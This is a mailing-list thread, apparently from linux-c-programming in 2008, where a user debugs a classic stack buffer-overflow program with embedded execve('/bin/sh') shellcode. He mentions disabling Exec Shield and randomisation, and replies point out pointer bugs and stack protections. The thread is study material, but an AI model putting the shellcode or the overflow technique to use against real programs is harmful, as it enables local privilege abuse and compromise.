* buffer overflow
From: Varun Chandramohan @ 2008-03-11  6:08 UTC (permalink / raw)
  To: linux-c-programming

Hi all,

             Can someone tell me what is wrong with this program? All I
get is a seg fault. I am trying to create a stack overflow and exec a
shell. Somehow it's not working. The system is x86 on Linux.
gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.



The Code:
#include <stdio.h>
#include <string.h>

/*
 * Machine-code bytes the author wants to land on the stack; only the
 * trailing "/bin/sh" is readable, the rest is opaque here (a later reply
 * in the thread says it disassembles to something invalid — not verified).
 * main() copies strlen(shellcode) bytes of it, so a NUL anywhere inside
 * would cut the copy short; this variant has none before its terminator.
 */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Compiled out. It contains \x00 bytes, which strlen()/strcpy() treat as
 * the end of the string. */
#if 0
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

#endif

/*
 * Staging area in which main() builds the overflow string. Zero-initialised
 * as a global, but main() overwrites all 128 bytes before treating it as a
 * C string (see the comments there).
 */
char large_string[128];
/*
 * Deliberately broken test program: fills large_string with the address
 * of a local stack array, overlays the shellcode bytes on the front of
 * it, then strcpy()s the result into a 96-byte stack array. Everything
 * after memset() is undefined behaviour, so what actually happens depends
 * on the compiler's frame layout and on any hardening in place; the
 * strace in the first reply shows it simply dying with SIGSEGV.
 */
int main() {
  char buffer[96];
  int i;
  /* Type-punning the char array as long[]: an alignment and
   * strict-aliasing violation. */
  long *long_ptr = (long *) large_string;
  /* &buffer has type char (*)[96]; same address as buffer, wrong type
   * (a later reply in the thread points this out). */
  memset(&buffer,0,sizeof(buffer));

  /* 32 * sizeof(long) stores: exactly 128 bytes on ILP32 (the author's
   * x86), which fills the array and leaves no NUL terminator; 256 bytes on
   * LP64, which writes 128 bytes past the end of large_string. Either way
   * large_string stops being a valid C string. */
  for (i = 0; i < 32; i++)
    *(long_ptr + i) =  (long)&buffer;

  /* int i vs size_t strlen(): signed/unsigned comparison (-Wsign-compare).
   * Copies the bytes without their terminator over the front of
   * large_string. */
  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  /* The out-of-bounds write the program exists to demonstrate: an
   * unbounded copy of at least 128 bytes into a 96-byte stack object.
   * Because the loop above overwrote every byte of large_string with
   * address bytes, there is normally no NUL left inside it, so this is
   * also an out-of-bounds *read* that continues into whatever follows
   * the array. */
  strcpy(buffer,large_string);
  /* No return statement: C99 makes main() return 0 here; under the gnu89
   * default of this GCC the exit status is unspecified. */
}



* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11  8:33 UTC (permalink / raw)
  To: Varun Chandramohan; +Cc: linux-c-programming

Hello, it has been a long time since I coded any C, but maybe this is of
some help:

strace ./test <-- use STRACE to see some more detail... 


Here is probably your error...
----- CODE -----
  for (i = 0; i < 32; i++)
    *(long_ptr + i) =  (long)&buffer;
----- /CODE -----


----- strace -----
execve("./test", ["./test"], [/* 36 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f4c000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=59381, ...}) = 0
mmap2(NULL, 59381, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f3d000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
open("/lib/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300e\1"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1413540, ...}) = 0
mmap2(NULL, 1418864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3,
0) = 0xb7de2000
mmap2(0xb7f37000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|
MAP_DENYWRITE, 3, 0x155) = 0xb7f37000
mmap2(0xb7f3a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|
MAP_ANONYMOUS, -1, 0) = 0xb7f3a000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7de1000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7de16b0,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7f37000, 4096, PROT_READ)   = 0
munmap(0xb7f3d000, 59381)               = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Process 28060 detached

------ /strace ------


Kind regards Patrik Båt

tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11 10:04 UTC (permalink / raw)
  To: Varun Chandramohan; +Cc: linux-c-programming


tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
strcpy(large_string,buffer);

//This is working tho...
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html



* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-11 10:41 UTC (permalink / raw)
  To: RTL; +Cc: linux-c-programming

Patrik Båt wrote:
> tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>   
>> Hi all,
>>
>>              Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions.  There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
>>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>>   char buffer[96];
>>   int i;
>>   long *long_ptr = (long *) large_string;
>>   memset(&buffer,0,sizeof(buffer));
>>
>>   for (i = 0; i < 32; i++)
>>     *(long_ptr + i) =  (long)&buffer;
>>
>>   for (i = 0; i < strlen(shellcode); i++)
>>     large_string[i] = shellcode[i];
>>
>>   strcpy(buffer,large_string);
>>     
> strcpy(large_string,buffer);
>
> //This is working tho...
>   
Thanks for the reply, but this doesn't spawn a shell, does it? This
simply avoids the SIGSEGV.
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>     
>
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>   

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: Patrik Båt, RTL @ 2008-03-11 12:04 UTC (permalink / raw)
  To: Varun Chandramohan; +Cc: linux-c-programming

Yeah, maybe some hardcore C coder in here can help you more...

My primary "tip of the day" was strace ;)


tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
> Patrik Båt wrote:
> > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
> >   
> >> Hi all,
> >>
> >>              Can someone tell me whats is wrong with this program? All i
> >> get is seg fault. Iam trying to create a stack overflow and exec a
> >> shell. Somehow its not working. The system is x86 on linux.
> >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> >> Copyright (C) 2006 Free Software Foundation, Inc.
> >> This is free software; see the source for copying conditions.  There is NO
> >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> >>
> >>
> >>
> >> The Code:
> >> #include <stdio.h>
> >> #include <string.h>
> >>
> >> char shellcode[] =
> >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> >> #if 0
> >> char shellcode[] =
> >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
> >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
> >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
> >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> >>
> >> #endif
> >>
> >> char large_string[128];
> >> int main() {
> >>   char buffer[96];
> >>   int i;
> >>   long *long_ptr = (long *) large_string;
> >>   memset(&buffer,0,sizeof(buffer));
> >>
> >>   for (i = 0; i < 32; i++)
> >>     *(long_ptr + i) =  (long)&buffer;
> >>
> >>   for (i = 0; i < strlen(shellcode); i++)
> >>     large_string[i] = shellcode[i];
> >>
> >>   strcpy(buffer,large_string);
> >>     
> > strcpy(large_string,buffer);
> >
> > //This is working tho...
> >   
> Thanks for the reply, but this doesnt spawn a shell, does it? This
> simply avoids the sigsegv
> >> }
> >>
> >> --
> >> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> >> the body of a message to majordomo@vger.kernel.org
> >> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> >>     
> >
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> > the body of a message to majordomo@vger.kernel.org
> > More majordomo info at  http://vger.kernel.org/majordomo-info.html
> >   
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
-- 
Med vänlig hälsning / Best regards

RTL CODEHACK
Netfilter Firewall

http://rtl.codehack.se

Patrik Båt
Email rtl@codehack.se
Phone +46 85 59 23 751
Cell  +46 70 78 22 540


--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: ninjaboy @ 2008-03-11 12:12 UTC (permalink / raw)
  To: Patrik Båt, RTL; +Cc: Varun Chandramohan, linux-c-programming

2008/3/11, Patrik Båt, RTL <rtl@codehack.se>:
> Yeah, maybe some hardcore c coder in here can help you more...
>
>  My primary "tip of the day" was strace ;)
>
>
>  tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
>  > Patrik Båt wrote:
>  > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>  > >
>  > >> Hi all,
>  > >>
>  > >>              Can someone tell me whats is wrong with this program? All i
>  > >> get is seg fault. Iam trying to create a stack overflow and exec a
>  > >> shell. Somehow its not working. The system is x86 on linux.
>  > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>  > >> Copyright (C) 2006 Free Software Foundation, Inc.
>  > >> This is free software; see the source for copying conditions.  There is NO
>  > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>  > >>
>  > >>
>  > >>
>  > >> The Code:
>  > >> #include <stdio.h>
>  > >> #include <string.h>
>  > >>
>  > >> char shellcode[] =
>  > >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>  > >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>  > >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>  > >> #if 0
>  > >> char shellcode[] =
>  > >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>  > >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>  > >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>  > >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>  > >>
>  > >> #endif
>  > >>
>  > >> char large_string[128];
>  > >> int main() {
>  > >>   char buffer[96];
>  > >>   int i;
>  > >>   long *long_ptr = (long *) large_string;
>  > >>   memset(&buffer,0,sizeof(buffer));
>  > >>
>  > >>   for (i = 0; i < 32; i++)
>  > >>     *(long_ptr + i) =  (long)&buffer;
>  > >>
>  > >>   for (i = 0; i < strlen(shellcode); i++)
>  > >>     large_string[i] = shellcode[i];
>  > >>
>  > >>   strcpy(buffer,large_string);
>  > >>
>  > > strcpy(large_string,buffer);
>  > >
>  > > //This is working tho...
>  > >
>  > Thanks for the reply, but this doesnt spawn a shell, does it? This
>  > simply avoids the sigsegv
>  > >> }

Maybe the stack is not executable?

-- 
noone is alone.
--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-11 13:24 UTC (permalink / raw)
  To: ninjaboy; +Cc: "Patrik Båt, RTL", linux-c-programming

ninjaboy wrote:
> 2008/3/11, Patrik Båt, RTL <rtl@codehack.se>:
>   
>> Yeah, maybe some hardcore c coder in here can help you more...
>>
>>  My primary "tip of the day" was strace ;)
>>
>>
>>  tis 2008-03-11 klockan 16:11 +0530 skrev Varun Chandramohan:
>>  > Patrik Båt wrote:
>>  > > tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>>  > >
>>  > >> Hi all,
>>  > >>
>>  > >>              Can someone tell me whats is wrong with this program? All i
>>  > >> get is seg fault. Iam trying to create a stack overflow and exec a
>>  > >> shell. Somehow its not working. The system is x86 on linux.
>>  > >> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>>  > >> Copyright (C) 2006 Free Software Foundation, Inc.
>>  > >> This is free software; see the source for copying conditions.  There is NO
>>  > >> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>  > >>
>>  > >>
>>  > >>
>>  > >> The Code:
>>  > >> #include <stdio.h>
>>  > >> #include <string.h>
>>  > >>
>>  > >> char shellcode[] =
>>  > >>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>  > >>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>  > >>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>>  > >> #if 0
>>  > >> char shellcode[] =
>>  > >>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>  > >>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>  > >>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>  > >>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>  > >>
>>  > >> #endif
>>  > >>
>>  > >> char large_string[128];
>>  > >> int main() {
>>  > >>   char buffer[96];
>>  > >>   int i;
>>  > >>   long *long_ptr = (long *) large_string;
>>  > >>   memset(&buffer,0,sizeof(buffer));
>>  > >>
>>  > >>   for (i = 0; i < 32; i++)
>>  > >>     *(long_ptr + i) =  (long)&buffer;
>>  > >>
>>  > >>   for (i = 0; i < strlen(shellcode); i++)
>>  > >>     large_string[i] = shellcode[i];
>>  > >>
>>  > >>   strcpy(buffer,large_string);
>>  > >>
>>  > > strcpy(large_string,buffer);
>>  > >
>>  > > //This is working tho...
>>  > >
>>  > Thanks for the reply, but this doesnt spawn a shell, does it? This
>>  > simply avoids the sigsegv
>>  > >> }
>>     
>
> Maybe stack is not executable?
>
>   
Nope, made sure it is... removed all the Exec Shield and random VM-space
protection. :)

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: vincent-perrier @ 2008-03-11 18:32 UTC (permalink / raw)
  To: Varun Chandramohan; +Cc: linux-c-programming

This is bad:
memset(&buffer,0,sizeof(buffer));
buffer is already the address of the space:
memset(buffer,0,...); is what I would do

This is bad too:
for (i = 0; i < 32; i++)
   *(long_ptr + i) =  (long)&buffer;

and most certainly does not do what you want.


On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
> Hi all,
> 
>              Can someone tell me whats is wrong with this program? All i
> get is seg fault. Iam trying to create a stack overflow and exec a
> shell. Somehow its not working. The system is x86 on linux.
> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
> Copyright (C) 2006 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> 
> 
> 
> The Code:
> #include <stdio.h>
> #include <string.h>
> 
> char shellcode[] =
>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
> #if 0
> char shellcode[] =
>         "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>         "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>         "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];
> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> &#0;
> 



* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-12  4:28 UTC (permalink / raw)
  To: Alfeiks Kaänoken; +Cc: RTL, linux-c-programming

Alfeiks Kaänoken wrote:
> Hi,
> A SIGSEGV is expected for your code - it means you tried to access
> memory outside the process's address space - i.e. through a wrong pointer
> value (the system doesn't care where it points).
> There is no stack overflow or anything else here; you can get more
> information from a debugger, but
> usually if you do get a stack overflow, gdb shows an unusable
> backtrace.
>
> BTW, could you explain your target ?
>
>   
My intention was to create a classic buffer overflow as shown in many
docs on the internet. But I believe that it doesn't work out of the box
because of all the various compiler changes. So I need to know how the
stack is organized by my compiler so that I can create the overflow.
Regards,
Varun
> On 11/03/2008, Varun Chandramohan <varunc@linux.vnet.ibm.com> wrote:
>   
>> Patrik Båt wrote:
>>     
>>> tis 2008-03-11 klockan 11:38 +0530 skrev Varun Chandramohan:
>>>
>>>       
>>>> Hi all,
>>>>
>>>>              Can someone tell me whats is wrong with this program? All
>>>>         
>> i
>>     
>>>> get is seg fault. Iam trying to create a stack overflow and exec a
>>>> shell. Somehow its not working. The system is x86 on linux.
>>>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>>>> Copyright (C) 2006 Free Software Foundation, Inc.
>>>> This is free software; see the source for copying conditions.  There is
>>>>         
>> NO
>>     
>>>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR
>>>>         
>> PURPOSE.
>>     
>>>>
>>>> The Code:
>>>> #include <stdio.h>
>>>> #include <string.h>
>>>>
>>>> char shellcode[] =
>>>>
>>>>         
>> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>     
>> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>     
>>>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>>>> #if 0
>>>> char shellcode[] =
>>>>
>>>>         
>> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>>     
>> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>>     
>> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>>     
>>>>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>>>
>>>> #endif
>>>>
>>>> char large_string[128];
>>>> int main() {
>>>>   char buffer[96];
>>>>   int i;
>>>>   long *long_ptr = (long *) large_string;
>>>>   memset(&buffer,0,sizeof(buffer));
>>>>
>>>>   for (i = 0; i < 32; i++)
>>>>     *(long_ptr + i) =  (long)&buffer;
>>>>
>>>>   for (i = 0; i < strlen(shellcode); i++)
>>>>     large_string[i] = shellcode[i];
>>>>
>>>>   strcpy(buffer,large_string);
>>>>
>>>>         
>>> strcpy(large_string,buffer);
>>>
>>> //This is working tho...
>>>
>>>       
>> Thanks for the reply, but this doesnt spawn a shell, does it? This
>> simply avoids the sigsegv
>>
>>     
>>>> }
>>>>
>>>> --
>>>> To unsubscribe from this list: send the line "unsubscribe
>>>>         
>> linux-c-programming" in
>>     
>>>> the body of a message to majordomo@vger.kernel.org
>>>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>>>
>>>>         
>>> --
>>> To unsubscribe from this list: send the line "unsubscribe
>>>       
>> linux-c-programming" in
>>     
>>> the body of a message to majordomo@vger.kernel.org
>>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>>
>>>       
>> --
>> To unsubscribe from this list: send the line "unsubscribe
>> linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>>
>>     
>
>
>
>   

--
To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: buffer overflow
From: Varun Chandramohan @ 2008-03-12  4:29 UTC (permalink / raw)
  To: vincent-perrier; +Cc: linux-c-programming

vincent-perrier wrote:
> This is bad:
> memset(&buffer,0,sizeof(buffer));
> buffer is already the address of the space:
> memset(buffer,0,...); is what I would do
>
>   
fine.
> This is bad too:
> for (i = 0; i < 32; i++)
>    *(long_ptr + i) =  (long)&buffer;
>
> and most certainly does not do what you want.
>
>   
can you suggest something better to achieve this?
> On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
>   
>> Hi all,
>>
>>              Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions.  There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>>         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>>         "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>>         "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
